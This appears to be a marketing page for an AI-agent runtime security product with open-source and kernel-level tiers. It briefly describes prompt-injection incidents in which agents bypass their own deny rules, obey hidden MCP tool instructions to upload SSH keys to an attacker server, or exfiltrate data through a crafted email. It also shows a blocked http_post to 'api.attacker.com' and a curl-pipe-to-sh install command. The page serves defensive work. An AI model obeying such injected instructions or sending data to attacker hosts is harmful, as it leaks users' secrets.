AI Agent Security

RUNTIME
SECURITY FOR
AI AGENTS

Your AI agents have access to your infrastructure. Nothing stops them from using it wrong.

>1.5M
decisions/sec
<1ms
latency overhead
Ring 0
BPF-LSM enforcement
LILITHLILITH ZERO (OPEN SOURCE)
These are working exploits with immediate, real-world consequences. Attackers silently hijack AI agents to exfiltrate sensitive data and move across enterprise systems, bypassing the human entirely.Michael BarguryCTO, Zenity · Black Hat USA 2025
Prompt injection is unlikely to ever be fully solved.OpenAIOfficial statement, December 2025
Attackers use AI freely. Defenders face red tape.Rob LeeChief AI Officer, SANS Institute · RSAC 2025
IDPI is no longer merely theoretical but is being actively weaponized. The web itself effectively becomes an LLM prompt delivery mechanism.Unit 42Palo Alto Networks Threat Research
These are working exploits with immediate, real-world consequences. Attackers silently hijack AI agents to exfiltrate sensitive data and move across enterprise systems, bypassing the human entirely.Michael BarguryCTO, Zenity · Black Hat USA 2025
Prompt injection is unlikely to ever be fully solved.OpenAIOfficial statement, December 2025
Attackers use AI freely. Defenders face red tape.Rob LeeChief AI Officer, SANS Institute · RSAC 2025
IDPI is no longer merely theoretical but is being actively weaponized. The web itself effectively becomes an LLM prompt delivery mechanism.Unit 42Palo Alto Networks Threat Research
An agent does not have the same human understanding of things that are wrong to do. When given a goal, an agent will do harmful things.Dean SysmanCo-founder, Axonius · Bessemer Venture Partners
The rapid adoption of AI agents has created an attack surface that most organizations do not even know exists. While vendors promise AI safety, attackers are already exploiting these systems in production.Ben KilgerCEO, Zenity
AI agents are autonomous, high-privilege actors that can reason, act, and chain workflows across systems.Barak TurovskyFormer Chief AI Officer, General Motors · Bessemer Venture Partners
These are working exploits with immediate, real-world consequences. Attackers silently hijack AI agents to exfiltrate sensitive data and move across enterprise systems, bypassing the human entirely.Michael BarguryCTO, Zenity · Black Hat USA 2025
An agent does not have the same human understanding of things that are wrong to do. When given a goal, an agent will do harmful things.Dean SysmanCo-founder, Axonius · Bessemer Venture Partners
The rapid adoption of AI agents has created an attack surface that most organizations do not even know exists. While vendors promise AI safety, attackers are already exploiting these systems in production.Ben KilgerCEO, Zenity
AI agents are autonomous, high-privilege actors that can reason, act, and chain workflows across systems.Barak TurovskyFormer Chief AI Officer, General Motors · Bessemer Venture Partners
These are working exploits with immediate, real-world consequences. Attackers silently hijack AI agents to exfiltrate sensitive data and move across enterprise systems, bypassing the human entirely.Michael BarguryCTO, Zenity · Black Hat USA 2025
Prompt injection is unlikely to ever be fully solved.OpenAIOfficial statement, December 2025
Attackers use AI freely. Defenders face red tape.Rob LeeChief AI Officer, SANS Institute · RSAC 2025
IDPI is no longer merely theoretical but is being actively weaponized. The web itself effectively becomes an LLM prompt delivery mechanism.Unit 42Palo Alto Networks Threat Research
An agent does not have the same human understanding of things that are wrong to do. When given a goal, an agent will do harmful things.Dean SysmanCo-founder, Axonius · Bessemer Venture Partners
Prompt injection is unlikely to ever be fully solved.OpenAIOfficial statement, December 2025
Attackers use AI freely. Defenders face red tape.Rob LeeChief AI Officer, SANS Institute · RSAC 2025
IDPI is no longer merely theoretical but is being actively weaponized. The web itself effectively becomes an LLM prompt delivery mechanism.Unit 42Palo Alto Networks Threat Research
An agent does not have the same human understanding of things that are wrong to do. When given a goal, an agent will do harmful things.Dean SysmanCo-founder, Axonius · Bessemer Venture Partners

Three attack classes your existing stack cannot see.

Each demonstrated in the wild. Firewalls, WAFs, CASB, and SIEM missed every one.

01CVE-2025-59536
Claude Code silently disables its own deny rules
Security checks stop firing when they cost too many tokens. Full RCE and API key theft confirmed via malicious repo files.
Lilith
Kernel hook fires on every connect(). No token budget at Ring 0.
02INVARIANT LABS · 2025
Tool descriptions exfiltrate SSH keys and configs
Instructions hidden in MCP tool descriptions directed agents to read and upload private keys to an attacker server. Affected Anthropic, OpenAI, Zapier, Cursor.
Lilith
Taint set on read_file. Outbound POST returns EPERM at the kernel before data leaves. Swapped MCP server refused before first call.
03CVE-2025-32711
One email. OneDrive, SharePoint, Teams. No click.
Crafted email caused Copilot to exfiltrate across three Microsoft services. Four controls bypassed. No alert fired.
Lilith
Taint tracks every read. EPERM at kernel before the packet forms, regardless of routing domain.

Firewalls inspect packets. WAFs inspect HTTP headers. EDRs watch process creation. None operate at tool-call granularity. None track data flow across calls. None enforce at the moment connect() fires. The only enforcement point that cannot be bypassed from userspace is the kernel.

Open SourceApache 2.0v0.2.1

Lilith Zero
SDK

Taint propagation + policy hooks at the application layer. Ships with pre-exec hooks for Claude Code and GitHub Copilot out of the box. Works with OpenClaw, closing dozens of CVEs still unpatched in production agent systems. No kernel requirements. No infrastructure changes.

>1.5M
decisions/sec
<1ms
overhead
Apache 2.0
license
CVC5
formal proofs
EXPLORE DOCSVIEW ON GITHUB

Questions or security feedback?

from lilith_zero import Lilith

async with Lilith(
    "python mcp_server.py",
    policy="policy.yaml",
) as lz:
    result = await lz.call_tool(
        "read_file",
        {"path": "/data/report.txt"},
    )
Runtime enforcement
✓ read_file("/data/report.txt")
taint: +file_read 0.4ms
✗ http_post("api.attacker.com")
taint: file_read → DENY 0.2ms
Install Lilith Zero
$curl -sSfL https://www.badcompany.xyz/lilith-zero/install.sh | sh
Products

ONE SECURITY
ARCHITECTURE.

Start open source at the application layer. Upgrade to kernel-level enforcement when the threat model demands it. Both run the same Cedar policy language and taint engine.

OPEN SOURCE

Lilith Zero

Application-layer enforcement for MCP agents. No kernel required.

  • -Cedar policy engine: policy-as-code, human-readable
  • -64-bit taint bitmask per agent session
  • -Python and TypeScript SDKs
  • -HMAC-signed tamper-evident audit log
  • -Apache 2.0 licensed, full source available
View on GitHub →
FIPS 140-2 ValidatedFIPS
140-2
ENTERPRISE

Lilith

Kernel-level enforcement. Zero agent code changes. Zero trust gaps.

  • -BPF-LSM at Ring 0, transparent to any agent framework
  • -SPIFFE/SPIRE cryptographic workload identity
  • -Fail-closed BPF heartbeat: all connections blocked if daemon dies
  • -Ed25519-signed policy capsules with anti-rollback watermarks
  • -FIPS 140-3 capable (aws-lc-rs crypto backend)
BOOK A DEMO →
SERVICES

Professional Services

Architecture review, deployment, and ongoing security posture.

  • -AI agent attack surface assessment and threat modeling
  • -White-box security audit of existing AI agent pipelines
  • -Cedar policy authoring and formal verification
  • -SPIRE deployment and SPIFFE identity integration
  • -Bespoke incident response and remediation planning
GET IN TOUCH →

OPEN SOURCE RESEARCH

Publishing our findings to secure the future of AI

Red-Teaming Agent

A comprehensive framework for LLM safety through adversarial prompt generation and automated evaluation.

Python

Hack the AI

Red-Teaming game where users hack realistic multimodal agent systems with RAG, memory, and tool usage.

TypeScript, Python, LangChain

CHIMERA

Cryptographic Honeypot & Intent-Mediated Enforcement Response Architecture

Python

Agency Without Assurance

Investigating the security risks of autonomous agents with full computer access and OpenClaw configuration vulnerabilities.

Security Audit
Newsletter

STAY UPDATED

Get the latest research on agentic security and product updates directly to your inbox.

No spam. Unsubscribe at any time.

MEET THE TEAM

János Mozer

János Mozer

CEO

Physics background with experience in developing error-proof systems for distributed, resilient architectures, guaranteeing high availability through secure protocols.

Gregorio Jaca

Gregorio Jaca

RESEARCHER & ARCHITECT

Physics and Biology background. Worked on simulations from fluid dynamics and rockets to network systems. Currently researching LLM dynamics and interpretability through the lens of chaos theory.

Péter Tallósy

Péter Tallósy

CTO

Physics-trained research engineer with deep expertise in ML/AI and full-stack software engineering capability. Experience in security and building directly on the hardware.

Get in Touch

LINKEDIN

Janos Mozer

DISCORD

Join Community